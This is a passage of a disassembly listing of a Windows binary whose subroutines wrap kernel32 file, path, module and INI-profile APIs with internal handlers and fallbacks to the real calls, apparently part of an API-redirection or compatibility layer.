loc_4DA87B: ; CODE XREF: sub_4DA7DD+8D�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4DA886
jmp short loc_4DA896
sub_4DA7DD endp
; =============== S U B R O U T I N E =======================================
sub_4DA886 proc near ; CODE XREF: sub_4DA7DD+A2�p
; DATA XREF: _5:004DEA80�o
mov eax, [ebp-20h]
mov [ebp-30h], eax
push dword ptr [ebp-30h]
call sub_4D83DD
pop ecx
retn
sub_4DA886 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4DA7DD
loc_4DA896: ; CODE XREF: sub_4DA7DD+A7�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
; END OF FUNCTION CHUNK FOR sub_4DA7DD
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DA8AA proc near ; DATA XREF: _6:004E1278�o
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 004DA9D8 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DEA88
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 20h
push ebx
push esi
push edi
and [ebp+var_20], 0
and [ebp+var_4], 0
push 104h
call sub_4D835A
pop ecx
mov [ebp+var_34], eax
mov eax, [ebp+var_34]
mov [ebp+var_20], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_20]
rep stosd
push 0
push 0
push 104h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_4E17B8 ; WideCharToMultiByte
mov [ebp+var_28], eax
lea edx, [ebp+var_24]
mov ecx, [ebp+var_20]
call sub_4D1CA8
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_4DA995
mov [ebp+var_1C], 1
movzx eax, [ebp+var_24]
neg eax
sbb eax, eax
and eax, 0Fh
inc eax
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov eax, [ebp+var_2C]
mov eax, [eax+0Ch]
mov ecx, [eax+1Ch]
mov eax, [eax+20h]
mov edx, [ebp+arg_8]
mov [edx+4], ecx
mov [edx+8], eax
mov eax, [ebp+var_2C]
mov eax, [eax+0Ch]
mov ecx, [eax+1Ch]
mov eax, [eax+20h]
mov edx, [ebp+arg_8]
mov [edx+0Ch], ecx
mov [edx+10h], eax
mov eax, [ebp+var_2C]
mov eax, [eax+0Ch]
mov ecx, [eax+1Ch]
mov eax, [eax+20h]
mov edx, [ebp+arg_8]
mov [edx+14h], ecx
mov [edx+18h], eax
mov eax, [ebp+arg_8]
and dword ptr [eax+1Ch], 0
mov eax, [ebp+var_2C]
mov eax, [eax]
mov ecx, [ebp+arg_8]
mov eax, [eax+8]
mov [ecx+20h], eax
jmp short loc_4DA9BD
; ---------------------------------------------------------------------------
loc_4DA995: ; CODE XREF: sub_4DA8AA+7B�j
push offset aKernel32_0 ; "kernel32"
push offset aGetfileattri_1 ; "GetFileAttributesExW"
call sub_4D9C22
pop ecx
pop ecx
mov [ebp+var_30], eax
cmp [ebp+var_30], 0
jz short loc_4DA9BD
push [ebp+arg_8]
push 0
push [ebp+arg_0]
call [ebp+var_30]
mov [ebp+var_1C], eax
loc_4DA9BD: ; CODE XREF: sub_4DA8AA+E9�j
; sub_4DA8AA+103�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4DA9C8
jmp short loc_4DA9D8
sub_4DA8AA endp
; =============== S U B R O U T I N E =======================================
sub_4DA9C8 proc near ; CODE XREF: sub_4DA8AA+117�p
; DATA XREF: _5:004DEA90�o
mov eax, [ebp-20h]
mov [ebp-38h], eax
push dword ptr [ebp-38h]
call sub_4D83DD
pop ecx
retn
sub_4DA9C8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4DA8AA
loc_4DA9D8: ; CODE XREF: sub_4DA8AA+11C�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_4DA8AA
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DA9EC proc near ; CODE XREF: sub_404716+1F5�p
; sub_405053+38�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_4D0672
test eax, eax
jnz short loc_4DAA11
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E1700 ; GetFileSize
mov [ebp+var_4], eax
jmp short loc_4DAA1D
; ---------------------------------------------------------------------------
loc_4DAA11: ; CODE XREF: sub_4DA9EC+12�j
cmp [ebp+arg_4], 0
jz short loc_4DAA1D
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
loc_4DAA1D: ; CODE XREF: sub_4DA9EC+23�j
; sub_4DA9EC+29�j
mov eax, [ebp+var_4]
leave
retn 8
sub_4DA9EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DAA24 proc near ; CODE XREF: sub_40409E+18�p
; sub_405898+58�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4D7141
add esp, 10h
test eax, eax
jnz short loc_4DAA57
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E1714 ; GetModuleFileNameA
mov [ebp+var_4], eax
loc_4DAA57: ; CODE XREF: sub_4DAA24+1F�j
mov eax, [ebp+var_4]
leave
retn 0Ch
sub_4DAA24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DAA5E proc near ; DATA XREF: _6:004E13B0�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push edi
and [ebp+var_4], 0
mov eax, [ebp+arg_8]
inc eax
push eax
call sub_4D835A
pop ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_8]
inc ecx
xor eax, eax
mov edi, [ebp+var_8]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
lea eax, [ebp+var_4]
push eax
push [ebp+arg_8]
push [ebp+var_8]
push [ebp+arg_0]
call sub_4D7141
add esp, 10h
test eax, eax
jnz short loc_4DAABF
push [ebp+arg_8]
push [ebp+var_8]
push [ebp+arg_0]
call ds:dword_4E1714 ; GetModuleFileNameA
mov [ebp+var_4], eax
loc_4DAABF: ; CODE XREF: sub_4DAA5E+4D�j
push [ebp+arg_8]
push [ebp+arg_4]
push 0FFFFFFFFh
push [ebp+var_8]
push 0
push 0
call ds:dword_4E1770 ; MultiByteToWideChar
mov eax, [ebp+var_8]
mov [ebp+var_10], eax
push [ebp+var_10]
call sub_4D83DD
pop ecx
mov eax, [ebp+var_4]
pop edi
leave
retn 0Ch
sub_4DAA5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DAAEB proc near ; DATA XREF: _6:004E13B8�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4D18CF
add esp, 10h
test eax, eax
jnz short loc_4DAB36
push offset aKernel32_0 ; "kernel32"
push offset aGetlongpathnam ; "GetLongPathNameA"
call sub_4D9C22
pop ecx
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4DAB36
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_8]
mov [ebp+var_4], eax
loc_4DAB36: ; CODE XREF: sub_4DAAEB+20�j
; sub_4DAAEB+3A�j
mov eax, [ebp+var_4]
leave
retn 0Ch
sub_4DAAEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DAB3D proc near ; DATA XREF: _6:004E13C0�o
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 004DAC52 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DEA98
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 24h
push ebx
push esi
push edi
and [ebp+var_1C], 0
mov eax, [ebp+arg_8]
inc eax
push eax
call sub_4D835A
pop ecx
mov [ebp+var_30], eax
mov eax, [ebp+var_30]
mov [ebp+var_24], eax
mov ecx, [ebp+arg_8]
inc ecx
xor eax, eax
mov edi, [ebp+var_24]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
push 400h
call sub_4D835A
pop ecx
mov [ebp+var_34], eax
mov eax, [ebp+var_34]
mov [ebp+var_20], eax
and [ebp+var_4], 0
push 0
push 0
push 400h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_4E17B8 ; WideCharToMultiByte
mov [ebp+var_28], eax
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push [ebp+var_24]
push [ebp+var_20]
call sub_4D18CF
add esp, 10h
test eax, eax
jnz short loc_4DAC0B
push offset aKernel32_0 ; "kernel32"
push offset aGetlongpathn_0 ; "GetLongPathNameW"
call sub_4D9C22
pop ecx
pop ecx
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_4DAC09
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_2C]
mov [ebp+var_1C], eax
loc_4DAC09: ; CODE XREF: sub_4DAB3D+BB�j
jmp short loc_4DAC28
; ---------------------------------------------------------------------------
loc_4DAC0B: ; CODE XREF: sub_4DAB3D+A1�j
mov eax, [ebp+var_1C]
cmp eax, [ebp+arg_8]
jnb short loc_4DAC28
push [ebp+arg_8]
push [ebp+arg_4]
push 0FFFFFFFFh
push [ebp+var_24]
push 0
push 0
call ds:dword_4E1770 ; MultiByteToWideChar
loc_4DAC28: ; CODE XREF: sub_4DAB3D:loc_4DAC09�j
; sub_4DAB3D+D4�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4DAC33
jmp short loc_4DAC52
sub_4DAB3D endp
; =============== S U B R O U T I N E =======================================
sub_4DAC33 proc near ; CODE XREF: sub_4DAB3D+EF�p
; DATA XREF: _5:004DEAA0�o
mov eax, [ebp-24h]
mov [ebp-38h], eax
push dword ptr [ebp-38h]
call sub_4D83DD
pop ecx
mov eax, [ebp-20h]
mov [ebp-3Ch], eax
push dword ptr [ebp-3Ch]
call sub_4D83DD
pop ecx
retn
sub_4DAC33 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4DAB3D
loc_4DAC52: ; CODE XREF: sub_4DAB3D+F4�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_4DAB3D
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DAC66 proc near ; DATA XREF: _6:004E1370�o
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
push 0
xor edx, edx
mov ecx, [ebp+arg_14]
call sub_4D19D2
test eax, eax
jz short loc_4DACE9
push 0
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4D1CC4
add esp, 1Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4DACE7
cmp [ebp+arg_8], 0
jz short loc_4DACE7
mov eax, [ebp+arg_10]
dec eax
push eax
push [ebp+arg_8]
push [ebp+arg_C]
call sub_4CC770
add esp, 0Ch
mov edi, [ebp+arg_8]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_10]
jnb short loc_4DACDB
mov eax, [ebp+var_8]
mov [ebp+var_C], eax
jmp short loc_4DACE1
; ---------------------------------------------------------------------------
loc_4DACDB: ; CODE XREF: sub_4DAC66+6B�j
mov eax, [ebp+arg_10]
mov [ebp+var_C], eax
loc_4DACE1: ; CODE XREF: sub_4DAC66+73�j
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
loc_4DACE7: ; CODE XREF: sub_4DAC66+3A�j
; sub_4DAC66+40�j
jmp short loc_4DAD04
; ---------------------------------------------------------------------------
loc_4DACE9: ; CODE XREF: sub_4DAC66+15�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E1724 ; GetPrivateProfileStringA
mov [ebp+var_4], eax
loc_4DAD04: ; CODE XREF: sub_4DAC66:loc_4DACE7�j
mov eax, [ebp+var_4]
pop edi
leave
retn 18h
sub_4DAC66 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DAD0C proc near ; DATA XREF: _6:004E1378�o
var_58 = dword ptr -58h
var_54 = byte ptr -54h
var_53 = byte ptr -53h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 58h
push edi
and [ebp+var_4], 0
push 0
xor edx, edx
mov ecx, [ebp+arg_C]
call sub_4D19D2
test eax, eax
jz short loc_4DAD76
and [ebp+var_54], 0
push 13h
pop ecx
xor eax, eax
lea edi, [ebp+var_53]
rep stosd
stosw
stosb
push 0
push [ebp+arg_C]
push 50h
lea eax, [ebp+var_54]
push eax
push offset dword_4E1918
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4D1CC4
add esp, 1Ch
mov [ebp+var_58], eax
cmp [ebp+var_58], 0
jnz short loc_4DAD67
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
jmp short loc_4DAD74
; ---------------------------------------------------------------------------
loc_4DAD67: ; CODE XREF: sub_4DAD0C+51�j
lea eax, [ebp+var_54]
push eax
call sub_4CCA75
pop ecx
mov [ebp+var_4], eax
loc_4DAD74: ; CODE XREF: sub_4DAD0C+59�j
jmp short loc_4DAD8B
; ---------------------------------------------------------------------------
loc_4DAD76: ; CODE XREF: sub_4DAD0C+19�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E171C ; GetPrivateProfileIntA
mov [ebp+var_4], eax
loc_4DAD8B: ; CODE XREF: sub_4DAD0C:loc_4DAD74�j
mov eax, [ebp+var_4]
pop edi
leave
retn 10h
sub_4DAD0C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DAD93 proc near ; DATA XREF: _6:004E1380�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push 0
xor edx, edx
mov ecx, [ebp+arg_8]
call sub_4D19D2
test eax, eax
jz short loc_4DADC5
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push 0
push 0
push 0
call sub_4D1CC4
add esp, 1Ch
mov [ebp+var_4], eax
jmp short loc_4DADD7
; ---------------------------------------------------------------------------
loc_4DADC5: ; CODE XREF: sub_4DAD93+12�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E1720 ; GetPrivateProfileSectionNamesA
mov [ebp+var_4], eax
loc_4DADD7: ; CODE XREF: sub_4DAD93+30�j
mov eax, [ebp+var_4]
leave
retn 0Ch
sub_4DAD93 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DADDE proc near ; DATA XREF: _6:004E1388�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push 0
xor edx, edx
mov ecx, [ebp+arg_C]
call sub_4D19D2
test eax, eax
jz short loc_4DAE11
push 1
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push 0
push 0
push [ebp+arg_0]
call sub_4D1CC4
add esp, 1Ch
mov [ebp+var_4], eax
jmp short loc_4DAE26
; ---------------------------------------------------------------------------
loc_4DAE11: ; CODE XREF: sub_4DADDE+12�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4DE02C ; GetPrivateProfileSectionA
mov [ebp+var_4], eax
loc_4DAE26: ; CODE XREF: sub_4DADDE+31�j
mov eax, [ebp+var_4]
leave
retn 10h
sub_4DADDE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DAE2D proc near ; CODE XREF: sub_4DAE83+8�p
; sub_4DAE96+9�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
jnz short loc_4DAE43
push 7Eh
call ds:dword_4E178C ; RtlRestoreLastWin32Error
xor eax, eax
jmp short locret_4DAE81
; ---------------------------------------------------------------------------
loc_4DAE43: ; CODE XREF: sub_4DAE2D+8�j
mov ecx, [ebp+arg_0]
call sub_4D5AD2
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4DAE7E
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
call sub_4D61E1
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4DAE7E
call ds:dword_4E1710 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_4DAE7A
push 7Eh
call ds:dword_4E178C ; RtlRestoreLastWin32Error
loc_4DAE7A: ; CODE XREF: sub_4DAE2D+43�j
xor eax, eax
jmp short locret_4DAE81
; ---------------------------------------------------------------------------
loc_4DAE7E: ; CODE XREF: sub_4DAE2D+25�j
; sub_4DAE2D+39�j
mov eax, [ebp+var_4]
locret_4DAE81: ; CODE XREF: sub_4DAE2D+14�j
; sub_4DAE2D+4F�j
leave
retn
sub_4DAE2D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DAE83 proc near ; CODE XREF: sub_40767D+5A�p
; sub_407E65+13A�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0
push [ebp+arg_0]
call sub_4DAE2D
pop ecx
pop ecx
pop ebp
retn 4
sub_4DAE83 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DAE96 proc near ; CODE XREF: sub_4D9518+B9�p
; sub_4D9789+B9�p ...
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push [ebp+arg_8]
push [ebp+arg_0]
call sub_4DAE2D
pop ecx
pop ecx
pop ebp
retn 0Ch
sub_4DAE96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DAEAA proc near ; CODE XREF: sub_4DAF65+8�p
; sub_4DAF78+9�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DEAA8
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 10h
push ebx
push esi
push edi
cmp [ebp+arg_0], 0
jnz short loc_4DAEE1
push 7Eh
call ds:dword_4E178C ; RtlRestoreLastWin32Error
xor eax, eax
jmp short loc_4DAF56
; ---------------------------------------------------------------------------
loc_4DAEE1: ; CODE XREF: sub_4DAEAA+29�j
and [ebp+var_1C], 0
and [ebp+var_4], 0
push 104h
call sub_4D835A
pop ecx
mov [ebp+var_20], eax
mov eax, [ebp+var_20]
mov [ebp+var_1C], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_1C]
rep stosd
push 0
push 0
push 104h
push [ebp+var_1C]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_4E17B8 ; WideCharToMultiByte
push [ebp+arg_4]
push [ebp+var_1C]
call sub_4DAE2D
pop ecx
pop ecx
push 0FFFFFFFFh
mov [ebp+var_28], eax
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_28]
jmp short loc_4DAF56
; ---------------------------------------------------------------------------
loc_4DAF44: ; DATA XREF: _5:004DEAB0�o
mov eax, [ebp+var_1C]
mov [ebp+var_24], eax
push [ebp+var_24]
call sub_4D83DD
pop ecx
retn
; ---------------------------------------------------------------------------
xor eax, eax
loc_4DAF56: ; CODE XREF: sub_4DAEAA+35�j
; sub_4DAEAA+98�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4DAEAA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DAF65 proc near ; DATA XREF: _6:004E12D8�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0
push [ebp+arg_0]
call sub_4DAEAA
pop ecx
pop ecx
pop ebp
retn 4
sub_4DAF65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DAF78 proc near ; DATA XREF: _6:004E12E8�o
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push [ebp+arg_8]
push [ebp+arg_0]
call sub_4DAEAA
pop ecx
pop ecx
pop ebp
retn 0Ch
sub_4DAF78 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DAF8C proc near ; CODE XREF: sub_407E65+F�p
; sub_407E65+264�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
jnz short loc_4DAFA0
push 0
call ds:dword_4E1718 ; GetModuleHandleA
jmp short locret_4DAFC2
; ---------------------------------------------------------------------------
loc_4DAFA0: ; CODE XREF: sub_4DAF8C+8�j
push [ebp+arg_0]
call ds:dword_4E1718 ; GetModuleHandleA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4DAFBF
xor dl, dl
mov ecx, [ebp+arg_0]
call sub_4D58CF
mov [ebp+var_4], eax
loc_4DAFBF: ; CODE XREF: sub_4DAF8C+24�j
mov eax, [ebp+var_4]
locret_4DAFC2: ; CODE XREF: sub_4DAF8C+12�j
leave
retn 4
sub_4DAF8C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DAFC6 proc near ; DATA XREF: _6:004E1358�o
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 004DB062 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DEAB8
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 10h
push ebx
push esi
push edi
cmp [ebp+arg_0], 0
jnz short loc_4DAFFB
push 0
call ds:dword_4E1718 ; GetModuleHandleA
jmp short loc_4DB065
; ---------------------------------------------------------------------------
loc_4DAFFB: ; CODE XREF: sub_4DAFC6+29�j
and [ebp+var_1C], 0
and [ebp+var_20], 0
and [ebp+var_4], 0
push 104h
call sub_4D835A
pop ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_20], eax
xor eax, eax
mov edi, [ebp+var_20]
stosd
push 0
push 0
push 104h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_4E17B8 ; WideCharToMultiByte
push [ebp+var_20]
call sub_4DAF8C
mov [ebp+var_1C], eax
or [ebp+var_4], 0FFFFFFFFh
call sub_4DB052
jmp short loc_4DB062
sub_4DAFC6 endp
; =============== S U B R O U T I N E =======================================
sub_4DB052 proc near ; CODE XREF: sub_4DAFC6+85�p
; DATA XREF: _5:004DEAC0�o
mov eax, [ebp-20h]
mov [ebp-28h], eax
push dword ptr [ebp-28h]
call sub_4D83DD
pop ecx
retn
sub_4DB052 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4DAFC6
loc_4DB062: ; CODE XREF: sub_4DAFC6+8A�j
mov eax, [ebp+var_1C]
loc_4DB065: ; CODE XREF: sub_4DAFC6+33�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
; END OF FUNCTION CHUNK FOR sub_4DAFC6
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB076 proc near ; CODE XREF: sub_40767D+71�p
; sub_40767D+7E�p ...
var_30 = dword ptr -30h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 004DB179 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DEAC8
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_1C], 0
mov eax, [ebp+arg_4]
shr eax, 10h
movzx eax, ax
test eax, eax
jz short loc_4DB0C9
push offset aDllgetclassobj ; "DllGetClassObject"
push [ebp+arg_4]
call ds:dword_4E17C0 ; lstrcmpi
test eax, eax
jnz short loc_4DB0C9
mov ecx, [ebp+arg_0]
call sub_4D5A41
loc_4DB0C9: ; CODE XREF: sub_4DB076+37�j
; sub_4DB076+49�j
and [ebp+var_4], 0
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E1728 ; GetProcAddress
mov [ebp+var_1C], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4DB0F9
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
and [ebp+var_30], 0
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_30]
jmp loc_4DB17C
; ---------------------------------------------------------------------------
loc_4DB0F9: ; CODE XREF: sub_4DB076+6A�j
cmp [ebp+var_1C], 0
jz short loc_4DB179
mov eax, ds:dword_4E60D4
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_4DB120
mov eax, [ebp+var_24]
add eax, 10h
push eax
call ds:dword_4DE01C ; RtlEnterCriticalSection
mov [ebp+var_28], 1
jmp short loc_4DB124
; ---------------------------------------------------------------------------
loc_4DB120: ; CODE XREF: sub_4DB076+95�j
and [ebp+var_28], 0
loc_4DB124: ; CODE XREF: sub_4DB076+A8�j
movzx eax, [ebp+var_28]
test eax, eax
jz short loc_4DB179
mov [ebp+var_4], 1
push [ebp+var_1C]
mov ecx, ds:dword_4E60D4
call sub_4DB871
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4DB152
mov eax, [ebp+var_20]
mov eax, [eax]
mov [ebp+var_1C], eax
loc_4DB152: ; CODE XREF: sub_4DB076+D2�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4DB15D
jmp short loc_4DB179
sub_4DB076 endp
; =============== S U B R O U T I N E =======================================
sub_4DB15D proc near ; CODE XREF: sub_4DB076+E0�p
; DATA XREF: _5:004DEADC�o
mov eax, ds:dword_4E60D4
mov [ebp-2Ch], eax
cmp dword ptr [ebp-2Ch], 0
jz short locret_4DB178
mov eax, [ebp-2Ch]
add eax, 10h
push eax
call ds:dword_4DE018 ; RtlLeaveCriticalSection
locret_4DB178: ; CODE XREF: sub_4DB15D+C�j
retn
sub_4DB15D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4DB076
loc_4DB179: ; CODE XREF: sub_4DB076+87�j
; sub_4DB076+B4�j ...
mov eax, [ebp+var_1C]
loc_4DB17C: ; CODE XREF: sub_4DB076+7E�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_4DB076
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
